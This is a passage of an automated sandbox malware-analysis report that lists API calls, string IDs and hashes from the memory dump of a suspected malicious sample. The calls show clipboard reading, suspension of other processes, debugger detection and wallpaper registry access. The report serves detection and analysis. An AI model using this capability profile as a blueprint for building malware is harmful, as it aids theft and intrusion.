                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040B711
                                • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                • CloseClipboard.USER32 ref: 0040B725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenSuspend
                                • String ID:
                                • API String ID: 1999457699-0
                                • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenResume
                                • String ID:
                                • API String ID: 3614150671-0
                                • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
